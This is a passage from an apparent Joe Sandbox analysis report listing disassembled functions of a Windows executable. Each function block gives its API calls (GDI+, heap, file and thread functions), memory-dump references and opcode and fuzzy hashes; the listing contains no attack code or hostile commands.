                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A09B30
                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A09B37
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: BitmapCreateFromGdipStream
                  • String ID:
                  • API String ID: 1918208029-0
                  • Opcode ID: d8e7e4d0208f24407470156de4c4da18dadd7126adc90280eb4d162b2831da33
                  • Instruction ID: c0e256e598dff65e8b91458be5c78803b8ba70a62d83d88f313b4c838a26ed38
                  • Opcode Fuzzy Hash: d8e7e4d0208f24407470156de4c4da18dadd7126adc90280eb4d162b2831da33
                  • Instruction Fuzzy Hash: 73E0ED7190121CEBCB10DF98E5016DAB7FCEB09321F10845FE89593241D6716E04AB91
                  Function 00A1215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00A1329A: try_get_function.LIBVCRUNTIME ref: 00A132AF
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A1217A
                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A12185
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                  • String ID:
                  • API String ID: 806969131-0
                  • Opcode ID: 3e180bbb6652ed33df6448b0e04dadf6590112941cc2c3be5577ad26c2a6defd
                  • Instruction ID: 1825bd33b70355ed4586bff405ba2f6e1062ea14b2f643e6a186c100c0d407a5
                  • Opcode Fuzzy Hash: 3e180bbb6652ed33df6448b0e04dadf6590112941cc2c3be5577ad26c2a6defd
                  • Instruction Fuzzy Hash: EAD0A936244312342C58EBB429423E82355A862BB43E00B46E7208A0D1EE20C4EAA311
                  Function 00A0DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • DloadLock.DELAYIMP ref: 00A0DC73
                  • DloadProtectSection.DELAYIMP ref: 00A0DC8F
                    • Part of subcall function 00A0DE67: DloadObtainSection.DELAYIMP ref: 00A0DE77
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Dload$Section$LockObtainProtect
                  • String ID:
                  • API String ID: 731663317-0
                  • Opcode ID: 4756ac6924a9d0c69450c0b6daf6613e2d1efd40ac16be459af7829bae8f4818
                  • Instruction ID: 778d6bdb10a5ed3fc7f1eb69a1ac3f2d8070e6249d75d249969ceb8412fc088c
                  • Opcode Fuzzy Hash: 4756ac6924a9d0c69450c0b6daf6613e2d1efd40ac16be459af7829bae8f4818
                  • Instruction Fuzzy Hash: 9ED012765003095FD226EBF4BA4AB2C7370BB05789F640645F505C70E0DFF44883C605
                  Function 009F12E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemShowWindow
                  • String ID:
                  • API String ID: 3351165006-0
                  • Opcode ID: dd61f9fcf06d2e775eb6098df5ae0e2bf1cada2dafe8c8cc1d5187c5559e0889
                  • Instruction ID: 0b3f6e7b9dca0c28326235481b550f77e0bdcd7d0d469ca73fc3c29af43f710c
                  • Opcode Fuzzy Hash: dd61f9fcf06d2e775eb6098df5ae0e2bf1cada2dafe8c8cc1d5187c5559e0889
                  • Instruction Fuzzy Hash: 3AC01232058600BECB018BB0DC09E2FBBA8BBA6212F05CA08F2A5C0060C638C010DB11
                  Function 009F19A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 40a3659c75d0ba011fe25ccdd0edc086de71922d04598301ef0ee9cf8826624a
                  • Instruction ID: 05aca3dbf0639837d423f032ee8b61917c9eb0474c58163e945c88fc8a2af205
                  • Opcode Fuzzy Hash: 40a3659c75d0ba011fe25ccdd0edc086de71922d04598301ef0ee9cf8826624a
                  • Instruction Fuzzy Hash: B3C1C330A0424CDFEF15CF68C494BB97BA9EF16310F1844BADE45DB286CB359944CBA1
                  Function 009F3B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: eb0828ac8be012ef1d2adf073a36c12533951a55cf743b6513546f5abb3c2e1b
                  • Instruction ID: 0bbd173bd2b3c39ab94b267f1ef844f27dabfccc0a820b55e63dd0b565ec65d4
                  • Opcode Fuzzy Hash: eb0828ac8be012ef1d2adf073a36c12533951a55cf743b6513546f5abb3c2e1b
                  • Instruction Fuzzy Hash: B771D171504F489EDB25DB30CC51AF7B7E8AF54301F44896EE6AB87282DB356A48DF10
                  Function 009F837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F8384
                    • Part of subcall function 009F1380: __EH_prolog.LIBCMT ref: 009F1385
                    • Part of subcall function 009F1380: new.LIBCMT ref: 009F13FE
                    • Part of subcall function 009F19A6: __EH_prolog.LIBCMT ref: 009F19AB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 8daf2b977ff66c37dbeae97f4463e17493ae98494a5316fd33f01ae649c635fc
                  • Instruction ID: 8ecf15f9d789f5ad6e35aebdb51548e9c540d4c3ee0b59d1700f4244e8bb37dd
                  • Opcode Fuzzy Hash: 8daf2b977ff66c37dbeae97f4463e17493ae98494a5316fd33f01ae649c635fc
                  • Instruction Fuzzy Hash: 9541A27184065C9ADF20DB60CC55BFAB3ACAF50314F0444EAE68AA74A3DF755AC8DB50
                  Function 009F1E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F1E05
                    • Part of subcall function 009F3B3D: __EH_prolog.LIBCMT ref: 009F3B42
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: c86365bfc4197a3d790f70cf9994aadf7eb64755c5ba940d57c931507c4fc83d
                  • Instruction ID: 76396367dac219ebae356eeb95cde4d0b08c48163d56616a830aa4531dcdeea6
                  • Opcode Fuzzy Hash: c86365bfc4197a3d790f70cf9994aadf7eb64755c5ba940d57c931507c4fc83d
                  • Instruction Fuzzy Hash: 9D21377290410CDFCB25EF98DA51AEEFBF6BF58300B10046EE945A7251CB325E10DBA0
                  Function 00A0A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00A0A7C8
                    • Part of subcall function 009F1380: __EH_prolog.LIBCMT ref: 009F1385
                    • Part of subcall function 009F1380: new.LIBCMT ref: 009F13FE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 81b23aba5cf5c29bb404d2a83324b40a9f99cb68a8dcdb28bd705f1c19a696e3
                  • Instruction ID: 7262c2524bc140af93d218198e3c8c596dd6a469cc04614d3ad5ea87afa21f7f
                  • Opcode Fuzzy Hash: 81b23aba5cf5c29bb404d2a83324b40a9f99cb68a8dcdb28bd705f1c19a696e3
                  • Instruction Fuzzy Hash: 44214C71C0424DEECF15DF98D9529EEBBB4EF59300F1044AEE809A7242DB356E06DBA1
                  Function 009F92E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a9a7ed644af151d0e38eea5806a7210e2bee4dcd0f73140afbf5b7ec74a5d8c5
                  • Instruction ID: 2792f07bb98c0773752e2d511d44c26b4bd2fff6f74f5a2f5220904c61dd358d
                  • Opcode Fuzzy Hash: a9a7ed644af151d0e38eea5806a7210e2bee4dcd0f73140afbf5b7ec74a5d8c5
                  • Instruction Fuzzy Hash: A1118E73A0052D9BCF26AAA8CD41BFEB736AF88750F044125FA04A7291CA759D1087A0
                  Function 009FAA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                  • Instruction ID: 2655546366c9e8c8c654de75f32c738c207b3243a53d6725c68810e960086302
                  • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                  • Instruction Fuzzy Hash: 12F08CB0500B0E9FDB30DA65C945726B7EEEB15320F20891AE69AC2680E770D888C742
                  Function 009F5BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F5BDC
                    • Part of subcall function 009FB07D: __EH_prolog.LIBCMT ref: 009FB082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: f6aa7fabb04d817529b4a93f11e0639ca0c209176db2596051e323c895aa5903
                  • Instruction ID: efc027f5a211f906b93bb4562919c21279a9a7a3e627c07137ae83ad49d9a57c
                  • Opcode Fuzzy Hash: f6aa7fabb04d817529b4a93f11e0639ca0c209176db2596051e323c895aa5903
                  • Instruction Fuzzy Hash: 6901D130A01688DAC724F7B8E0253EDF7A49F5D300F40419DA95A132D3CFB01B08C762
                  Function 00A18518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A1C13D,00000000,?,00A167E2,?,00000008,?,00A189AD,?,?,?), ref: 00A1854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: f3f1feb81c9c2db1844b67a95e5fbb11dda61d2da0b08a55e782c8a6a6e24ecb
                  • Instruction ID: e8046899ad88d7952fcb032e09ff81714f592babcb7953d625bd7a91f2f82fc4
                  • Opcode Fuzzy Hash: f3f1feb81c9c2db1844b67a95e5fbb11dda61d2da0b08a55e782c8a6a6e24ecb
                  • Instruction Fuzzy Hash: 50E0E5316406619BEB3127696C00BEA379EDF517B0F140220AC14A6091DE2CCCC145E5
                  Function 009F96D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,009F968F,?,?,?,?,00A21FA1,000000FF), ref: 009F96EB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: 8825633521263b481a9bd376e44b51761fadb558e0e9fd9cf44e1248013ba2c2
                  • Instruction ID: 82aaebf3485bb5eb4ef1df6bbfb7f4c7565fc5c46746183b7e8acdb8c55a99b1
                  • Opcode Fuzzy Hash: 8825633521263b481a9bd376e44b51761fadb558e0e9fd9cf44e1248013ba2c2
                  • Instruction Fuzzy Hash: D2F08231556B088FDB309A24D5597A2B7E89B13739F048B1ED2F7834E0E765688E8F10
                  Function 009FA4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 009FA4F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: 595e115e6432180494c60c577113493f1528e3ed0c0916b0b7ba88bc0ef2e2e7
                  • Instruction ID: d9d7a8fe55745c1628232551e11906207059078eb977623bc9530e90d35cec09
                  • Opcode Fuzzy Hash: 595e115e6432180494c60c577113493f1528e3ed0c0916b0b7ba88bc0ef2e2e7
                  • Instruction Fuzzy Hash: 5EF0E97100C384AACA325BB888047EA7B946F46331F04CA09F3FD02191C2B824C69733
                  Function 00A0067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                  Download Yara Rule
                  APIs
                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00A006B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ExecutionStateThread
                  • String ID:
                  • API String ID: 2211380416-0
                  • Opcode ID: 2ad9fcb17a2b8537654d188b55f31672612e558c1509c0ecfb2c4e95dfb9dc02
                  • Instruction ID: 13db5dd0491b8e56f8fcafd2f77734cf1f2590e10f905e9b7af30a490dda837d
                  • Opcode Fuzzy Hash: 2ad9fcb17a2b8537654d188b55f31672612e558c1509c0ecfb2c4e95dfb9dc02
                  • Instruction Fuzzy Hash: 8BD0122664415826DA257378BA19BFE1A1B4FC3710F090065B50D575C68A8B089757A2
                  Function 00A09D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GdipAlloc.GDIPLUS(00000010), ref: 00A09D81
                    • Part of subcall function 00A09B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A09B30
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Gdip$AllocBitmapCreateFromStream
                  • String ID:
                  • API String ID: 1915507550-0
                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction ID: 35b464555df97b91bfae3fe43bf7922cf4d44ee7d10ed7c2b98d959cba894e43
                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction Fuzzy Hash: AAD0A73025420C7BDF40FB70AC0297B7BA8DB04310F008065BC08861C2FD71DE10A261
                  Function 009F9989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  • GetFileType.KERNELBASE(000000FF,009F9887), ref: 009F9995
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
